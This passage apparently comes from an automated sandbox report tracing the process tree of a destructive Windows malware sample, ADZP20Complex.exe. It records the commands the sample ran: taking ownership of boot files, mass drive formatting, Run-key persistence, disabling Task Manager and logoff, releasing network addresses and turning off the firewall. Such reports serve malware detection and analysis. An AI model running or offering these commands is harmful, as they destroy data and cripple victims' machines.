        7⤵
        Possible privilege escalation attempt
        
        PID:9712
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10580
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:10900
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:11396
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10840
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:11268
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:12808
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:12864
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3268
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:4868
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4184
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:3444
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:4284
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4FB6.tmp\4FB7.tmp\4FB8.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:7960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:8420
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:9024
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8476
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:10180
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:11024
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:10840
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:11792
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:9728
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:11796
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13024
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13108
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4768
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:4656
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4928
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:4136
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:3108
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5551.tmp\5552.tmp\5553.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:8184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:8508
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:8644
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:8484
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:9340
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:10348
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:9340
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:10352
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:5608
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:184
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:12416
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:9388
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:12008
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4872
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5012
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5104
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:4660
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:4464
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:5216
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:5932
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:5076
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:6364
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:7048
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:6544
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:7380
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:8336
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:10008
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:11380
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:12480
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\VBICodec.ax"
        5⤵
        Possible privilege escalation attempt
        
        PID:2704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:6964
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2916
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:544
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2832
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:3056
- - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1616
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C320.tmp\C321.tmp\C322.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
      4⤵
      Drops startup file
      PID:1780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:3016
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:296
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2128
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:2728
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:584
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1828
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:532
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:552
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:1536
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2484
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2844
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:1092
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2064
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2640
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:2020
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        
        PID:896
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2292
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2456
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1504
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2424
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2972
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:304
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2856
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2440
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2732
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3076
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EB78.tmp\EB79.tmp\EB7A.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7088
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:4660
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5084
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3168
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4932
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4912
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:3312
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7680
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6884
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8732
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8772
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8824
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8860
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8904
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8928
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8956
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9016
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9040
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:9144
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9208
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:7984
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:8456
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8808
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:8584
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:9252
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9364
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:9548
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9600
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:9656
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:9748
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:9988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11580
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3096
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3112
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3120
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3132
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3148
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EB68.tmp\EB79.tmp\EB7A.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3476
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7080
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4620
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:5076
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4876
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4620
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4792
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4876
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:5068
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4904
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4696
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5096
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4916
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:3648
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7072
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5740
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6884
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7388
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8144
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8168
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6196
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7860
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:1980
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:1656
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8020
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7004
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:8200
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8252
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8292
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8344
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:8428
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8536
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8568
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8596
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8620
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:8652
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8700
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8748
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8780
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8816
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8868
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10508
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12124
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12980
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11268
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:6776
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3164
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3196
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3220
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3228
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3244
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\ECEE.tmp\ECEF.tmp\ECF0.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:2640
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:6984
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:4436
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:3100
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4264
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4912
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4856
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:3648
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:5076
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4912
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3868
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5132
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6272
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7120
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5076
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7124
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7816
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8228
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8280
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8328
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8360
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8396
        
        C:\Windows\system32\wscript.exe
        
